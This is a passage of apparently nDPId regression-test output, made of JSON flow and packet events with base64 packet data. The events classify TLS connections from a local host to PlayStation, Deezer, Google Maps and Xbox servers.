-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879566,"flow_last_seen":1646482879566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879566,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1646482879566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879566,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZJ5AAEAGuDfAqAGAFwFEvd\/4Abu+RY+DAAAAAKAC+vCgEQAAAgQFtAQCCAqibL0tAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1646482879585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879585,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGI9YXAUS9wKgBgAG73\/iES9VYvkWPhKAS\/ojG\/QAAAgQFtAQCCApEcjdUomy9LQEDAwc="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1646482879590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879590,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZKBAAEAGtjjAqAGAFwFEvd\/4Abu+RY+EhEvVWYAYAfb4UwAAAQEICqJsvUREcjdUFgMBAgABAAH8AwPTmj1yotJrCU5Axy8WSqX4RbWM\/SINHTcC+qIJwwqdWyAtxwR2GOpVXqzss+L4QuffJNllYoSRruXn4YOMT1n2UQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAYABYAABN3d3cucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIO+m+y4kE\/Ul0wRfLnWkNqXDSHnFmA3tI1g\/5Tv\/EZwCABcAQQQh+3EFl7VEJWAHnTsK42aVbCexqYTb9DwqjdAN6Pu9IMJwjvRFdXg\/Y6aZYu3btbo89OdSMmSsifn4YkrISGSJACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879566,"flow_last_seen":1646482879590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879590,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4380,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","server_names":"playstation.com,webforms.playstation.com,www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Mateo, O=SONY INTERACTIVE ENTERTAINMENT LLC, CN=www.playstation.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"19:BC:48:84:B7:B0:91:46:45:D5:DD:3B:B5:8D:8E:45:E8:42:1A:8A"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879964,"flow_last_seen":1646482879964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879964,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1646482879964,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879964,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8nmNAAEAGzLvAqAGAFzP2QbS4AbvcfW4jAAAAAKAC+vARXQAAAgQFtAQCCAo1KzXVAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1646482879981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879981,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGcx8XM\/ZBwKgBgAG7tLg0LEpK3H1uJKAS\/oiOFAAAAgQFtAQCCAqG0XpXNSs11QEDAwc="} -01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1646482879983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5nmVAAEAGyrzAqAGAFzP2QbS4AbvcfW4kNCxKS4AYAfZhPwAAAQEICjUrNeiG0XpXFgMBAgABAAH8AwOVj3yfLLIdpS7ph9cCyv5vCYAGlSzvdrVr1N5tbcI94SDvfvqZxXeUOWdQ166wenjn8HB2CzcmnFG8kG7bSApHKAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAbABkAABZzdGF0aWMucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AID7op1onM6THMaho0vMOrhWIG6UTS6n8xwsrP6D1biscABcAQQR0Q9Knvll2eKORbkRyexBvYc7r+Q69FpqwjjnvO3KMU7d3ZPOw9jaGO1B0c9lo8UIHFSOSayE0o5gPreutfPv3ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879964,"flow_last_seen":1646482879983,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879998,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482896911,"flow_last_seen":1646482896911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482896911,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1646482896911,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896911,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPpAAEAGn8vAqAGAbIrHQ6iOAbuXn2EUAAAAAKAC+vCb0AAAAgQFtAQCCApW0sF4AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1646482896918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896918,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8E58AAPcGuiZsisdDwKgBgAG7qI5txRYul59hFaAS\/\/+2KgAAAgQFoAQCCAqPYc1DVtLBeAEDAwg="} -01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1646482896921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482896921,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pPxAAEAGnczAqAGAbIrHQ6iOAbuXn2EVbcUWL4AYAfaXogAAAQEIClbSwYKPYc1DFgMBAgABAAH8AwNMrbkme+2pG6WKGaUcTfCs10ic95it0jPiimTr5KWaaiCmUwwyrZpDXgONpktntKRQJ28LAppHGUwuuBwH65AqlAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAApkZWV6ZXIuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIAS3iFI+Lml2aqbJ99HMOh2pxKpjuORM+VA6AJN2jS5cABcAQQS2OgHZ7hQeCCurKRe6Z6o4CXtv3DRVG4xO7HV8XVI+fMr+wQD4VFXUBMvHu9XDFEguxQ+LZymMWbInoPBoAAbBACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482896911,"flow_last_seen":1646482896921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482896921,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482896928,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482916232,"flow_last_seen":1646482916232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482916232,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1646482916232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916232,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ooZAAEAGcYnAqAGAEkFSQ8tmAFAueWmfAAAAAKAC+vBogwAAAgQFtAQCCApZaACoAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1646482916249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916249,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Lu8AAPcGbiASQVJDwKgBgABQy2YtbN9PLnlpoKAS\/\/+hEQAAAgQFoAQCCAqviQYeWWgAqAEDAwk="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482940480,"flow_last_seen":1646482940480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482940480,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1646482940480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940480,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA806FAAEAGYWnAqAGAjvq0jpfKAbsw63pbAAAAAKAC+vDytAAAAgQFtAQCCAoU3PsAAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1646482940487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940487,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8FycAAHkGJGSO+rSOwKgBgAG7l8rhydulMOt6XKAS\/\/9c9AAAAgQFlgQCCAqRbEHhFNz7AAEDAwg="} -01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1646482940491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482940491,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI506NAAEAGX2rAqAGAjvq0jpfKAbsw63pc4cnbpoAYAfb+6AAAAQEIChTc+wqRbEHhFgMBAgABAAH8AwO7ribOnVQsY1sOMkcbEYXbLY3qPQQ51Elay7+WtVSrNSAVw+m3VKjUN5Kg0hk0Rcql0l9JhorDl+A6BcRaD2MOQwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAUABIAAA9tYXBzLmdvb2dsZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgZi1V3KN\/7YwDfK8H3VIJ+hl8oG\/pcyHsJbGlMXjOc2MAFwBBBJu4yUB5A9M8e+22tNqv37PZXfAJovqkKxk\/cRDsm65QH7HDIBoXPUoAJy1c6x2wwBosAz8dzXVrLnN4Hqic9PsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482940480,"flow_last_seen":1646482940491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482940491,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":444,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482940513,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482995689,"flow_last_seen":1646482995689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482995689,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1646482995689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995689,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8enxAAEAGb8fAqAGAAhGMP78GAburV\/8MAAAAAKAC+vDqEgAAAgQFtAQCCArEqeKzAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1646482995709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8kMCEYw\/wKgBgAG7vwYhgnsXq1f\/DaAS\/ohOCgAAAgQFtAQCCAocht8\/xKniswEDAwc="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1646482995711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482995711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5en5AAEAGbcjAqAGAAhGMP78GAburV\/8NIYJ7GIAYAfY3gAAAAQEICsSp4socht8\/FgMBAgABAAH8AwNFE1YF0dNQQhTDT2LTts3l72ip1ON6WYuBYFjp45zAOSCfsggN3rEBQ1caacueVCEG9V0G2r03kBuc\/FQ9ILx8tQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBhY2NvdW50Lnhib3guY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIKOdg7M8WplrJ1dHmYhafGTWEV65\/XHCmgpJRZB9OyhxABcAQQSUMlyZp7X5PylQs43MbEemG5LZD4aMK86EfSyduzhW1kr6wtZBIJI7MJb\/MCOqF0\/ebXOaYXIP5autWsClQmu8ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAA